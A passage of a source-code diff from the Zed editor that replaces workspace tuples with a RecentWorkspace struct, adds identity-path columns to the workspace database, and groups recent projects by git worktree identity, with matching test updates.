@@ -1891,8 +1874,11 @@ impl PickerDelegate for RecentProjectsDelegate { Some(ProjectPickerEntry::RecentProject(hit)) => self .workspaces .get(hit.candidate_id) - .map(|(_, loc, ..)| { - matches!(loc, SerializedWorkspaceLocation::Local) + .map(|workspace| { + matches!( + workspace.location, + SerializedWorkspaceLocation::Local + ) }) .unwrap_or(false), _ => false, @@ -2129,22 +2115,23 @@ impl RecentProjectsDelegate { if let 
Some(ProjectPickerEntry::RecentProject(selected_match)) = self.filtered_entries.get(ix) { - let (workspace_id, _, _, _) = &self.workspaces[selected_match.candidate_id]; - let workspace_id = *workspace_id; + let recent_workspace = self.workspaces[selected_match.candidate_id].clone(); let fs = self .workspace .upgrade() .map(|ws| ws.read(cx).app_state().fs.clone()); let db = WorkspaceDb::global(cx); cx.spawn_in(window, async move |this, cx| { - db.delete_workspace_by_id(workspace_id).await.log_err(); let Some(fs) = fs else { return }; + let deleted_workspace_ids = db + .delete_recent_workspace_group(&recent_workspace) + .await + .log_err() + .unwrap_or_default(); let workspaces = db .recent_project_workspaces(fs.as_ref()) .await .unwrap_or_default(); - let workspaces = - workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |picker, window, cx| { picker.delegate.set_workspaces(workspaces); picker @@ -2155,8 +2142,11 @@ impl RecentProjectsDelegate { // After deleting a project, we want to update the history manager to reflect the change. // But we do not emit a update event when user opens a project, because it's handled in `workspace::load_workspace`. 
if let Some(history_manager) = HistoryManager::global(cx) { - history_manager - .update(cx, |this, cx| this.delete_history(workspace_id, cx)); + history_manager.update(cx, |this, cx| { + for workspace_id in &deleted_workspace_ids { + this.delete_history(*workspace_id, cx); + } + }); } }) .ok(); @@ -2209,10 +2199,10 @@ impl RecentProjectsDelegate { false } - fn is_in_current_window_groups(&self, paths: &PathList) -> bool { + fn is_in_current_window_groups(&self, workspace: &RecentWorkspace) -> bool { self.window_project_groups .iter() - .any(|key| key.path_list() == paths) + .any(|key| key.matches(&workspace.project_group_key())) } fn is_open_folder(&self, paths: &PathList) -> bool { @@ -2233,13 +2223,12 @@ impl RecentProjectsDelegate { fn is_valid_recent_candidate( &self, - workspace_id: WorkspaceId, - paths: &PathList, + workspace: &RecentWorkspace, cx: &mut Context>, ) -> bool { - !self.is_current_workspace(workspace_id, cx) - && !self.is_in_current_window_groups(paths) - && !self.is_open_folder(paths) + !self.is_current_workspace(workspace.workspace_id, cx) + && !self.is_in_current_window_groups(workspace) + && !self.is_open_folder(&workspace.paths) } } diff --git a/crates/recent_projects/src/sidebar_recent_projects.rs b/crates/recent_projects/src/sidebar_recent_projects.rs index f19531c7070526..495907d3934b4a 100644 --- a/crates/recent_projects/src/sidebar_recent_projects.rs +++ b/crates/recent_projects/src/sidebar_recent_projects.rs @@ -1,6 +1,5 @@ use std::sync::Arc; -use chrono::{DateTime, Utc}; use fuzzy_nucleo::{StringMatch, StringMatchCandidate, match_strings}; use gpui::{ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, @@ -16,8 +15,8 @@ use ui::{ButtonLike, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*} use ui_input::ErasedEditor; use util::{ResultExt, paths::PathExt}; use workspace::{ - MultiWorkspace, OpenMode, OpenOptions, PathList, ProjectGroupKey, SerializedWorkspaceLocation, - Workspace, 
WorkspaceDb, WorkspaceId, notifications::DetachAndPromptErr, + MultiWorkspace, OpenMode, OpenOptions, ProjectGroupKey, RecentWorkspace, + SerializedWorkspaceLocation, Workspace, WorkspaceDb, notifications::DetachAndPromptErr, }; use zed_actions::OpenRemote; @@ -74,8 +73,6 @@ impl SidebarRecentProjects { .await .log_err() .unwrap_or_default(); - let workspaces = - workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await; this.update_in(cx, move |this, window, cx| { this.picker.update(cx, move |picker, cx| { picker.delegate.set_workspaces(workspaces); @@ -116,12 +113,7 @@ impl Render for SidebarRecentProjects { pub struct SidebarRecentProjectsDelegate { workspace: WeakEntity, window_project_groups: Vec, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, + workspaces: Vec, filtered_workspaces: Vec, selected_index: usize, has_any_non_local_projects: bool, @@ -129,18 +121,10 @@ pub struct SidebarRecentProjectsDelegate { } impl SidebarRecentProjectsDelegate { - pub fn set_workspaces( - &mut self, - workspaces: Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - ) { + pub fn set_workspaces(&mut self, workspaces: Vec) { self.has_any_non_local_projects = workspaces .iter() - .any(|(_, location, _, _)| !matches!(location, SerializedWorkspaceLocation::Local)); + .any(|workspace| !matches!(workspace.location, SerializedWorkspaceLocation::Local)); self.workspaces = workspaces; } } @@ -206,15 +190,16 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { .workspaces .iter() .enumerate() - .filter(|(_, (id, _, paths, _))| { - Some(*id) != current_workspace_id + .filter(|(_, workspace)| { + Some(workspace.workspace_id) != current_workspace_id && !self .window_project_groups .iter() - .any(|key| key.path_list() == paths) + .any(|key| key.matches(&workspace.project_group_key())) }) - .map(|(id, (_, _, paths, _))| { - let combined_string = paths + .map(|(id, workspace)| { + let 
combined_string = workspace + .identity_paths .ordered_paths() .map(|path| path.compact().to_string_lossy().into_owned()) .collect::>() @@ -251,9 +236,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { let Some(hit) = self.filtered_workspaces.get(self.selected_index) else { return; }; - let Some((_, location, candidate_workspace_paths, _)) = - self.workspaces.get(hit.candidate_id) - else { + let Some(recent_workspace) = self.workspaces.get(hit.candidate_id) else { return; }; @@ -261,10 +244,10 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { return; }; - match location { + match &recent_workspace.location { SerializedWorkspaceLocation::Local => { if let Some(handle) = window.window_handle().downcast::() { - let paths = candidate_workspace_paths.paths().to_vec(); + let paths = recent_workspace.paths.paths().to_vec(); cx.defer(move |cx| { if let Some(task) = handle .update(cx, |multi_workspace, window, cx| { @@ -290,7 +273,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { crate::RemoteSettings::get_global(cx) .fill_connection_options_from_settings(connection); }; - let paths = candidate_workspace_paths.paths().to_vec(); + let paths = recent_workspace.paths.paths().to_vec(); cx.spawn_in(window, async move |_, cx| { open_remote_project(connection.clone(), paths, app_state, open_options, cx) .await @@ -326,14 +309,15 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { cx: &mut Context>, ) -> Option { let hit = self.filtered_workspaces.get(ix)?; - let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?; + let workspace = self.workspaces.get(hit.candidate_id)?; - let ordered_paths: Vec<_> = paths + let ordered_paths: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact().to_string_lossy().to_string()) .collect(); - let tooltip_path: SharedString = match &location { + let tooltip_path: SharedString = match &workspace.location { SerializedWorkspaceLocation::Remote(options) => { let host = 
options.display_name(); if ordered_paths.len() == 1 { @@ -346,7 +330,8 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { }; let mut path_start_offset = 0; - let match_labels: Vec<_> = paths + let match_labels: Vec<_> = workspace + .identity_paths .ordered_paths() .map(|p| p.compact()) .map(|path| { @@ -357,7 +342,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { }) .collect(); - let prefix = match &location { + let prefix = match &workspace.location { SerializedWorkspaceLocation::Remote(options) => { Some(SharedString::from(options.display_name())) } @@ -371,7 +356,7 @@ impl PickerDelegate for SidebarRecentProjectsDelegate { active: false, }; - let icon = icon_for_remote_connection(match location { + let icon = icon_for_remote_connection(match &workspace.location { SerializedWorkspaceLocation::Local => None, SerializedWorkspaceLocation::Remote(options) => Some(options), }); diff --git a/crates/workspace/src/history_manager.rs b/crates/workspace/src/history_manager.rs index 8e60939a9c25be..09f47d19ab2e69 100644 --- a/crates/workspace/src/history_manager.rs +++ b/crates/workspace/src/history_manager.rs @@ -49,9 +49,12 @@ impl HistoryManager { .unwrap_or_default() .into_iter() .rev() - .filter_map(|(id, location, paths, _timestamp)| { - if matches!(location, SerializedWorkspaceLocation::Local) { - Some(HistoryManagerEntry::new(id, &paths)) + .filter_map(|workspace| { + if matches!(workspace.location, SerializedWorkspaceLocation::Local) { + Some(HistoryManagerEntry::new( + workspace.workspace_id, + &workspace.paths, + )) } else { None } diff --git a/crates/workspace/src/persistence.rs b/crates/workspace/src/persistence.rs index 7248abe9b8dba7..b1328aa3614905 100644 --- a/crates/workspace/src/persistence.rs +++ b/crates/workspace/src/persistence.rs @@ -21,6 +21,7 @@ use db::{ }; use gpui::{Axis, Bounds, Task, WindowBounds, WindowId, point, size}; use project::{ + ProjectGroupKey, bookmark_store::SerializedBookmark, 
debugger::breakpoint_store::{BreakpointState, SourceBreakpoint}, trusted_worktrees::{DbTrustedPaths, RemoteHostLocation}, @@ -1032,6 +1033,10 @@ impl Domain for WorkspaceDb { ON UPDATE CASCADE ); ), + sql!( + ALTER TABLE workspaces ADD COLUMN identity_paths TEXT; + ALTER TABLE workspaces ADD COLUMN identity_paths_order TEXT; + ), ]; // Allow recovering from bad migration that was initially shipped to nightly @@ -1084,6 +1089,8 @@ impl WorkspaceDb { workspace_id, paths, paths_order, + identity_paths, + identity_paths_order, window_bounds, display, centered_layout, @@ -1093,6 +1100,8 @@ impl WorkspaceDb { WorkspaceId, String, String, + Option, + Option, Option, Option, Option, @@ -1104,6 +1113,8 @@ impl WorkspaceDb { workspace_id, paths, paths_order, + identity_paths, + identity_paths_order, window_state, window_x, window_y, @@ -1141,6 +1152,12 @@ impl WorkspaceDb { paths, order: paths_order, }); + let identity_paths = identity_paths.map(|paths| { + PathList::deserialize(&SerializedPathList { + paths, + order: identity_paths_order.unwrap_or_default(), + }) + }); let remote_connection_options = if let Some(remote_connection_id) = remote_connection_id { self.remote_connection(remote_connection_id) @@ -1157,6 +1174,7 @@ impl WorkspaceDb { None => SerializedWorkspaceLocation::Local, }, paths, + identity_paths, center_group: self .get_center_pane_group(workspace_id) .context("Getting center group") @@ -1181,6 +1199,8 @@ impl WorkspaceDb { let ( paths, paths_order, + identity_paths, + identity_paths_order, window_bounds, display, centered_layout, @@ -1190,6 +1210,8 @@ impl WorkspaceDb { ): ( String, String, + Option, + Option, Option, Option, Option, @@ -1201,6 +1223,8 @@ impl WorkspaceDb { SELECT paths, paths_order, + identity_paths, + identity_paths_order, window_state, window_x, window_y, @@ -1231,6 +1255,12 @@ impl WorkspaceDb { paths, order: paths_order, }); + let identity_paths = identity_paths.map(|paths| { + PathList::deserialize(&SerializedPathList { + paths, + 
order: identity_paths_order.unwrap_or_default(), + }) + }); let remote_connection_id = remote_connection_id.map(|id| RemoteConnectionId(id as u64)); let remote_connection_options = if let Some(remote_connection_id) = remote_connection_id { @@ -1248,6 +1278,7 @@ impl WorkspaceDb { None => SerializedWorkspaceLocation::Local, }, paths, + identity_paths, center_group: self .get_center_pane_group(workspace_id) .context("Getting center group") @@ -1416,10 +1447,9 @@ impl WorkspaceDb { ret } - /// Saves a workspace using the worktree roots. Will garbage collect any workspaces - /// that used this workspace previously pub(crate) async fn save_workspace(&self, workspace: SerializedWorkspace) { let paths = workspace.paths.serialize(); + let identity_paths = workspace.identity_paths.map(|paths| paths.serialize()); log::debug!("Saving workspace at location: {:?}", workspace.location); self.write(move |conn| { conn.with_savepoint("update_worktrees", || { @@ -1535,6 +1565,8 @@ impl WorkspaceDb { workspace_id, paths, paths_order, + identity_paths, + identity_paths_order, remote_connection_id, left_dock_visible, left_dock_active_panel, @@ -1549,23 +1581,25 @@ impl WorkspaceDb { window_id, timestamp ) - VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11, ?12, ?13, ?14, ?15, CURRENT_TIMESTAMP) + VALUES (?1, ?2, ?3, ?4, ?5, ?6, ?7, ?8, ?9, ?10, ?11, ?12, ?13, ?14, ?15, ?16, ?17, CURRENT_TIMESTAMP) ON CONFLICT DO UPDATE SET paths = ?2, paths_order = ?3, - remote_connection_id = ?4, - left_dock_visible = ?5, - left_dock_active_panel = ?6, - left_dock_zoom = ?7, - right_dock_visible = ?8, - right_dock_active_panel = ?9, - right_dock_zoom = ?10, - bottom_dock_visible = ?11, - bottom_dock_active_panel = ?12, - bottom_dock_zoom = ?13, - session_id = ?14, - window_id = ?15, + identity_paths = ?4, + identity_paths_order = ?5, + remote_connection_id = ?6, + left_dock_visible = ?7, + left_dock_active_panel = ?8, + left_dock_zoom = ?9, + right_dock_visible = ?10, + right_dock_active_panel = 
?11, + right_dock_zoom = ?12, + bottom_dock_visible = ?13, + bottom_dock_active_panel = ?14, + bottom_dock_zoom = ?15, + session_id = ?16, + window_id = ?17, timestamp = CURRENT_TIMESTAMP ); let mut prepared_query = conn.exec_bound(query)?; @@ -1573,6 +1607,8 @@ impl WorkspaceDb { workspace.id, paths.paths.clone(), paths.order.clone(), + identity_paths.as_ref().map(|paths| paths.paths.clone()), + identity_paths.as_ref().map(|paths| paths.order.clone()), remote_connection_id, workspace.docks, workspace.session_id, @@ -1747,6 +1783,7 @@ impl WorkspaceDb { Vec<( WorkspaceId, PathList, + Option, Option, Option, DateTime, @@ -1756,10 +1793,25 @@ impl WorkspaceDb { .recent_workspaces_query()? .into_iter() .map( - |(id, paths, order, remote_connection_id, session_id, timestamp)| { + |( + id, + paths, + order, + identity_paths, + identity_paths_order, + remote_connection_id, + session_id, + timestamp, + )| { ( id, PathList::deserialize(&SerializedPathList { paths, order }), + identity_paths.map(|paths| { + PathList::deserialize(&SerializedPathList { + paths, + order: identity_paths_order.unwrap_or_default(), + }) + }), remote_connection_id.map(RemoteConnectionId), session_id, parse_timestamp(×tamp), @@ -1770,8 +1822,8 @@ impl WorkspaceDb { } query! { - fn recent_workspaces_query() -> Result, Option, String)>> { - SELECT workspace_id, paths, paths_order, remote_connection_id, session_id, timestamp + fn recent_workspaces_query() -> Result, Option, Option, Option, String)>> { + SELECT workspace_id, paths, paths_order, identity_paths, identity_paths_order, remote_connection_id, session_id, timestamp FROM workspaces WHERE paths IS NOT NULL OR @@ -1944,31 +1996,26 @@ impl WorkspaceDb { any_dir } - // Returns the recent project workspaces suitable for showing in the recent-projects UI. - // Scratch workspaces (no paths) are filtered out - they aren't really "projects" and - // are restored separately by `last_session_workspace_locations`. 
- pub async fn recent_project_workspaces( + // Returns the raw recent workspace history. Scratch workspaces (no paths) are filtered + // out because they are restored separately by `last_session_workspace_locations`. + pub async fn recent_project_workspaces_ungrouped( &self, fs: &dyn Fs, - ) -> Result< - Vec<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - > { + ) -> Result> { let remote_connections = self.remote_connections()?; let mut result = Vec::new(); - for (id, paths, remote_connection_id, _session_id, timestamp) in self.recent_workspaces()? { + for (id, paths, identity_paths_hint, remote_connection_id, _session_id, timestamp) in + self.recent_workspaces()? + { if let Some(remote_connection_id) = remote_connection_id { if let Some(connection_options) = remote_connections.get(&remote_connection_id) { - result.push(( - id, - SerializedWorkspaceLocation::Remote(connection_options.clone()), - paths, + result.push(RecentWorkspace { + workspace_id: id, + location: SerializedWorkspaceLocation::Remote(connection_options.clone()), + paths: paths.clone(), + identity_paths: identity_paths_hint.unwrap_or(paths), timestamp, - )); + }); } continue; } @@ -1978,12 +2025,76 @@ impl WorkspaceDb { } if Self::all_paths_exist_with_a_directory(paths.paths(), fs).await { - result.push((id, SerializedWorkspaceLocation::Local, paths, timestamp)); + let identity_paths = resolve_local_workspace_identity(fs, &paths) + .await + .or(identity_paths_hint) + .unwrap_or_else(|| paths.clone()); + result.push(RecentWorkspace { + workspace_id: id, + location: SerializedWorkspaceLocation::Local, + paths, + identity_paths, + timestamp, + }); } } + Ok(result) } + // Returns the recent project workspaces suitable for recent-project UIs. + // Entries are deduplicated by git worktree identity, but preserve the original + // serialized paths for reopening. 
+ pub async fn recent_project_workspaces(&self, fs: &dyn Fs) -> Result> { + Ok(dedupe_recent_workspaces( + self.recent_project_workspaces_ungrouped(fs).await?, + )) + } + + pub async fn delete_recent_workspace_group( + &self, + target: &RecentWorkspace, + ) -> Result> { + let target_paths = &target.identity_paths; + let target_remote_connection = match &target.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(connection) => { + Some(remote_connection_identity(connection)) + } + }; + + let remote_connections = self.remote_connections()?; + + let mut workspace_ids = Vec::new(); + for (workspace_id, paths, identity_paths, remote_connection_id, _, _) in + self.recent_workspaces()? + { + let remote_connection = if let Some(id) = remote_connection_id { + let Some(connection_options) = remote_connections.get(&id) else { + continue; + }; + Some(remote_connection_identity(connection_options)) + } else { + None + }; + if remote_connection == target_remote_connection + && &identity_paths.unwrap_or(paths) == target_paths + { + workspace_ids.push(workspace_id); + } + } + + futures::future::join_all( + workspace_ids + .iter() + .copied() + .map(|workspace_id| self.delete_workspace_by_id(workspace_id)), + ) + .await; + + Ok(workspace_ids) + } + // Deletes workspace rows that can no longer be restored from. Remote workspaces whose // connection was removed, and (on Windows) workspaces pointing at WSL paths, are cleaned // up immediately. Local workspaces with no valid paths on disk are kept for seven days @@ -1998,7 +2109,9 @@ impl WorkspaceDb { let remote_connections = self.remote_connections()?; let now = Utc::now(); let mut workspaces_to_delete = Vec::new(); - for (id, paths, remote_connection_id, session_id, timestamp) in self.recent_workspaces()? { + for (id, paths, _identity_paths_hint, remote_connection_id, session_id, timestamp) in + self.recent_workspaces()? 
+ { if let Some(session_id) = session_id.as_deref() { if session_id == current_session_id || Some(session_id) == last_session_id { continue; @@ -2038,17 +2151,7 @@ impl WorkspaceDb { Ok(()) } - pub async fn last_workspace( - &self, - fs: &dyn Fs, - ) -> Result< - Option<( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, - )>, - > { + pub async fn last_workspace(&self, fs: &dyn Fs) -> Result> { Ok(self.recent_project_workspaces(fs).await?.into_iter().next()) } @@ -2536,80 +2639,73 @@ VALUES {placeholders};"# } } -type WorkspaceEntry = ( - WorkspaceId, - SerializedWorkspaceLocation, - PathList, - DateTime, -); - -/// Resolves workspace entries whose paths are git linked worktree checkouts -/// to their main repository paths. -/// -/// For each workspace entry: -/// - If any path is a linked worktree checkout, all worktree paths in that -/// entry are resolved to their main repository paths, producing a new -/// `PathList`. -/// - The resolved entry is then deduplicated against existing entries: if a -/// workspace with the same paths already exists, the entry with the most -/// recent timestamp is kept. -pub async fn resolve_worktree_workspaces( - workspaces: impl IntoIterator, - fs: &dyn Fs, -) -> Vec { - // First pass: resolve worktree paths to main repo paths concurrently. 
- let resolved = futures::future::join_all(workspaces.into_iter().map(|entry| async move { - let paths = entry.2.paths(); - if paths.is_empty() { - return entry; - } - - // Resolve each path concurrently - let resolved_paths = futures::future::join_all( - paths - .iter() - .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)), - ) - .await; +#[derive(Clone, Debug, PartialEq)] +pub struct RecentWorkspace { + pub workspace_id: WorkspaceId, + pub location: SerializedWorkspaceLocation, + pub paths: PathList, + pub identity_paths: PathList, + pub timestamp: DateTime, +} - // If no paths were resolved, this entry is not a worktree — keep as-is - if resolved_paths.iter().all(|r| r.is_none()) { - return entry; - } +impl RecentWorkspace { + pub fn project_group_key(&self) -> ProjectGroupKey { + let host = match &self.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(options) => Some(options.clone()), + }; + ProjectGroupKey::new(host, self.identity_paths.clone()) + } +} - // Build new path list, substituting resolved paths - let new_paths: Vec = paths +async fn resolve_local_workspace_identity(fs: &dyn Fs, paths: &PathList) -> Option { + let raw_paths = paths.paths(); + let resolved_paths = futures::future::join_all( + raw_paths .iter() - .zip(resolved_paths.iter()) - .map(|(original, resolved)| { - resolved - .as_ref() - .cloned() - .unwrap_or_else(|| original.clone()) - }) - .collect(); - - let new_path_refs: Vec<&Path> = new_paths.iter().map(|p| p.as_path()).collect(); - (entry.0, entry.1, PathList::new(&new_path_refs), entry.3) - })) + .map(|path| project::git_store::resolve_git_worktree_to_main_repo(fs, path)), + ) .await; - // Second pass: deduplicate by PathList. - // When two entries resolve to the same paths, keep the one with the - // more recent timestamp. 
- let mut seen: collections::HashMap, usize> = collections::HashMap::default(); - let mut result: Vec = Vec::new(); - - for entry in resolved { - let key: Vec = entry.2.paths().to_vec(); - if let Some(&existing_idx) = seen.get(&key) { - // Keep the entry with the more recent timestamp - if entry.3 > result[existing_idx].3 { - result[existing_idx] = entry; + if resolved_paths.iter().all(|resolved| resolved.is_none()) { + return None; + } + + let resolved_paths: Vec = raw_paths + .iter() + .zip(resolved_paths.iter()) + .map(|(original, resolved)| { + resolved + .as_ref() + .cloned() + .unwrap_or_else(|| original.clone()) + }) + .collect(); + let resolved_path_refs: Vec<&Path> = resolved_paths.iter().map(PathBuf::as_path).collect(); + Some(PathList::new(&resolved_path_refs)) +} + +fn dedupe_recent_workspaces( + workspaces: impl IntoIterator, +) -> Vec { + let mut indices_by_key: HashMap<(Option, Vec), usize> = + HashMap::default(); + let mut result: Vec = Vec::new(); + for workspace in workspaces { + let location_identity = match &workspace.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(connection) => { + Some(remote_connection_identity(connection)) + } + }; + let key = (location_identity, workspace.identity_paths.paths().to_vec()); + if let Some(&existing_index) = indices_by_key.get(&key) { + if workspace.timestamp > result[existing_index].timestamp { + result[existing_index] = workspace; } } else { - seen.insert(key, result.len()); - result.push(entry); + indices_by_key.insert(key, result.len()); + result.push(workspace); } } @@ -2796,6 +2892,7 @@ mod tests { let workspace = SerializedWorkspace { id, paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -2952,6 +3049,7 @@ mod tests { let workspace = SerializedWorkspace { id, paths: PathList::new(&["/tmp"]), + identity_paths: None, location: 
SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3001,6 +3099,7 @@ mod tests { let workspace_without_breakpoint = SerializedWorkspace { id, paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3100,6 +3199,7 @@ mod tests { let mut workspace_1 = SerializedWorkspace { id: WorkspaceId(1), paths: PathList::new(&["/tmp", "/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3116,6 +3216,7 @@ mod tests { let workspace_2 = SerializedWorkspace { id: WorkspaceId(2), paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3224,6 +3325,7 @@ mod tests { let workspace = SerializedWorkspace { id: WorkspaceId(5), paths: PathList::new(&["/tmp", "/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group, window_bounds: Default::default(), @@ -3259,6 +3361,7 @@ mod tests { let workspace_1 = SerializedWorkspace { id: WorkspaceId(1), paths: PathList::new(&["/tmp", "/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3275,6 +3378,7 @@ mod tests { let mut workspace_2 = SerializedWorkspace { id: WorkspaceId(2), paths: PathList::new(&["/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3318,6 +3422,7 @@ mod tests { let mut workspace_3 = SerializedWorkspace { id: WorkspaceId(3), paths: PathList::new(&["/tmp2", "/tmp"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ 
-3357,6 +3462,7 @@ mod tests { let workspace_1 = SerializedWorkspace { id: WorkspaceId(1), paths: PathList::new(&["/tmp1"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3373,6 +3479,7 @@ mod tests { let workspace_2 = SerializedWorkspace { id: WorkspaceId(2), paths: PathList::new(&["/tmp2"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3389,6 +3496,7 @@ mod tests { let workspace_3 = SerializedWorkspace { id: WorkspaceId(3), paths: PathList::new(&["/tmp3"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3405,6 +3513,7 @@ mod tests { let workspace_4 = SerializedWorkspace { id: WorkspaceId(4), paths: PathList::new(&["/tmp4"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3430,6 +3539,7 @@ mod tests { let workspace_5 = SerializedWorkspace { id: WorkspaceId(5), paths: PathList::default(), + identity_paths: None, location: SerializedWorkspaceLocation::Remote( db.remote_connection(connection_id).unwrap(), ), @@ -3448,6 +3558,7 @@ mod tests { let workspace_6 = SerializedWorkspace { id: WorkspaceId(6), paths: PathList::new(&["/tmp6c", "/tmp6b", "/tmp6a"]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3506,6 +3617,7 @@ mod tests { SerializedWorkspace { id: WorkspaceId(4), paths: PathList::new(paths), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: center_group.clone(), window_bounds: Default::default(), @@ -3548,6 +3660,7 @@ mod tests { .map(|(id, paths, window_id)| SerializedWorkspace { id: WorkspaceId(id), paths: PathList::new(paths.as_slice()), + 
identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -3646,6 +3759,7 @@ mod tests { SerializedWorkspace { id: WorkspaceId(id as i64), paths: PathList::new(paths), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group, window_bounds: Default::default(), @@ -3660,6 +3774,48 @@ mod tests { } } + fn remote_workspace_with(id: u64, host: &str, paths: &[&Path]) -> SerializedWorkspace { + SerializedWorkspace { + id: WorkspaceId(id as i64), + paths: PathList::new(paths), + identity_paths: None, + location: SerializedWorkspaceLocation::Remote(RemoteConnectionOptions::Ssh( + SshConnectionOptions { + host: host.into(), + ..Default::default() + }, + )), + center_group: empty_pane_group(), + window_bounds: Default::default(), + display: Default::default(), + docks: Default::default(), + bookmarks: Default::default(), + breakpoints: Default::default(), + centered_layout: false, + session_id: None, + window_id: Some(id), + user_toolchains: Default::default(), + } + } + + async fn local_recent_workspace( + workspace_id: WorkspaceId, + paths: PathList, + timestamp: DateTime, + fs: &dyn Fs, + ) -> RecentWorkspace { + let identity_paths = resolve_local_workspace_identity(fs, &paths) + .await + .unwrap_or_else(|| paths.clone()); + RecentWorkspace { + workspace_id, + location: SerializedWorkspaceLocation::Local, + paths, + identity_paths, + timestamp, + } + } + #[gpui::test] async fn test_scratch_only_workspace_restores_from_last_session(cx: &mut gpui::TestAppContext) { let fs = fs::FakeFs::new(cx.executor()); @@ -3680,7 +3836,9 @@ mod tests { let recents = db.recent_project_workspaces(fs.as_ref()).await.unwrap(); assert!( - recents.iter().all(|(id, ..)| *id != WorkspaceId(1)), + recents + .iter() + .all(|workspace| workspace.workspace_id != WorkspaceId(1)), "scratch-only workspace must not appear in the recent-projects UI" ); } @@ -3883,6 +4041,7 @@ mod tests { .map(|(id, 
remote_connection, window_id)| SerializedWorkspace { id: WorkspaceId(id), paths: PathList::default(), + identity_paths: None, location: SerializedWorkspaceLocation::Remote(remote_connection), center_group: Default::default(), window_bounds: Default::default(), @@ -4245,6 +4404,7 @@ mod tests { let workspace = SerializedWorkspace { id, paths: PathList::new(empty_paths), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: None, @@ -4322,6 +4482,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: WorkspaceId(*id), paths: PathList::new(&[*dir]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4608,6 +4769,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: workspace2_db_id, paths: PathList::new(&[&dir]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4704,6 +4866,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: ws1_id, paths: PathList::new(&[dir1.path()]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4721,6 +4884,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: ws2_id, paths: PathList::new(&[dir2.path()]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4800,6 +4964,7 @@ mod tests { db.save_workspace(SerializedWorkspace { id: workspace2_db_id, paths: PathList::new(&[&dir]), + identity_paths: None, location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), @@ -4957,7 +5122,7 @@ mod tests { } #[gpui::test] - async fn test_resolve_worktree_workspaces(cx: &mut gpui::TestAppContext) { + async fn 
